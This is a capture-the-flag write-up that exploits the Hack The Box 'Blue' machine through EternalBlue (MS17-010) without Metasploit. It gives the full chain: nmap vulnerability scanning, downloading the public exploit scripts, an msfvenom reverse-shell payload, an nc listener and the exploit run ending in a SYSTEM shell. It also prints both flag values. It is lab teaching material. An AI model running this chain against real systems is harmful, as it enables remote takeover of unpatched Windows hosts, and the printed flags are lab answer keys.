Post

Hack The Box - Blue (Without Metasploit)

Configuration

The operating system that I will be using to tackle this machine is a Kali Linux VM.

What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts.

1
$ echo "10.10.10.40 blue.htb" | sudo tee -a /etc/hosts

Reconnaissance

To speed up my recon, I’ve moved to rustscan. I’ve also created 2 “aliases” called superscan and resolve.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
$ which resolve 
resolve () {
        cat /etc/hosts | grep --color=auto "$1" | cut -d " " -f 1
}

$ which superscan
superscan () {
        name="$(resolve $1)" 
        rustscan --accessible -a "$name" -r 1-65535 -- -sT -sV -sC -Pn
}

$ superscan blue.htb
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.40:135
Open 10.10.10.40:139
Open 10.10.10.40:445
Open 10.10.10.40:49152
Open 10.10.10.40:49153
Open 10.10.10.40:49154
Open 10.10.10.40:49155
Open 10.10.10.40:49156
Open 10.10.10.40:49157
Starting Script(s)
Script to be run Some("nmap -vvv -p  ")

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-12 07:09 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 07:09
Completed Parallel DNS resolution of 1 host. at 07:09, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 07:09
Scanning 10.10.10.40 [9 ports]
Discovered open port 135/tcp on 10.10.10.40
Discovered open port 139/tcp on 10.10.10.40
Discovered open port 445/tcp on 10.10.10.40
Discovered open port 49157/tcp on 10.10.10.40
Discovered open port 49152/tcp on 10.10.10.40
Discovered open port 49153/tcp on 10.10.10.40
Discovered open port 49155/tcp on 10.10.10.40
Discovered open port 49156/tcp on 10.10.10.40
Discovered open port 49154/tcp on 10.10.10.40
Completed Connect Scan at 07:09, 0.01s elapsed (9 total ports)
Initiating Service scan at 07:09
Scanning 9 services on 10.10.10.40
Service scan Timing: About 44.44% done; ETC: 07:11 (0:01:08 remaining)
Completed Service scan at 07:10, 58.73s elapsed (9 services on 1 host)
NSE: Script scanning 10.10.10.40.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 8.98s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Nmap scan report for 10.10.10.40
Host is up, received user-set (0.0062s latency).
Scanned at 2021-01-12 07:09:20 UTC for 68s

PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 2s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53207/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 12383/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 19006/udp): CLEAN (Timeout)
|   Check 4 (port 54754/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-01-12T07:10:24+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-01-12T07:10:22
|_  start_date: 2021-01-12T07:07:47

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.19 seconds

Enumeration

Port 445 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

If we use the smb-vuln-* scripts of nmap, we see that it is vulnerable to EternalBlue.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ nmap -Pn -p 445 --script smb-vuln-* blue.htb                                 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-10 09:21 EST
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.0097s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 12.13 seconds

Exploitation

Metasploit has modules that exploit this vulnerability but I will be using some scripts that I found on Github that are able to do the same job.

1
2
3
4
$ mkdir eternalblue
$ curl https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py > eternalblue/send_and_execute.py
$ curl https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py > eternalblue/mysmb.py
$ curl https://raw.githubusercontent.com/worawit/MS17-010/master/checker.py > eternalblue/checker.py

Exploiting EternalBlue requires us to find an accessible named pipe, so lets run checker.py.

1
2
3
4
5
6
7
8
9
10
$ python eternablue/checker.py blue.htb
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

We are getting STATUS_ACCESS_DENIED. Let’s try setting our username to guest in the script and see if it changes anything.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ cat eternalblue/checker.py
...
USERNAME = 'guest'
...

$ python eternalblue/checker.py blue.htb
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

It seems there are 3 named pipes we can use and note that the machine is 64-bit. Now we just need to prepare an executable that establishes a reverse shell connection back to us when executed. We can use msfvenom for this.

1
2
3
4
5
6
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f exe > reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes

Now that is done, we setup our nc listener.

1
2
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...

Then finally we can exploit the vulnerability with send_and_execute.py and specifying our executable and the name of the named pipe we want to use. Remember to set the username to guest as well.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
$ cat eternalblue/send_and_execute.py
...
USERNAME = 'guest'
...

$ python eternalblue/send_and_execute.py blue.htb reverse.exe 445 samr                               
Trying to connect to blue.htb:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001d24920
SESSION: 0xfffff8a0082119e0
FLINK: 0xfffff8a001173048
InParam: 0xfffff8a00282715c
MID: 0x807
unexpected alignment, diff: 0x-16b4fb8
leak failed... try again
CONNECTION: 0xfffffa8001d24920
SESSION: 0xfffff8a0082119e0
FLINK: 0xfffff8a002887088
InParam: 0xfffff8a00288115c
MID: 0x803
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file YDERDS.exe...
Opening SVCManager on blue.htb.....
Creating service hRhL.....
Starting service hRhL.....
The NETBIOS connection with the remote host timed out.
Removing service hRhL.....
ServiceExec Error on: blue.htb
nca_s_proto_error
Done

On our listener that we setup beforehand, we receive a connection.

1
2
3
4
5
6
7
8
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Nice, we got SYSTEM!

user.txt

The user flag is located at the desktop of haris.

1
2
C:\Users\haris\Desktop> type user.txt
4c546aea7dbee75cbd71de245c8deea9

root.txt

The root flag is located at the desktop of Administrator, as always.

1
2
C:\Users\Administrator\Desktop> type root.txt
ff548eb71e920ff6c08843ce9df4e717

Rooted ! Thank you for reading and look forward for more writeups and articles !

This post is licensed under CC BY 4.0 by the author.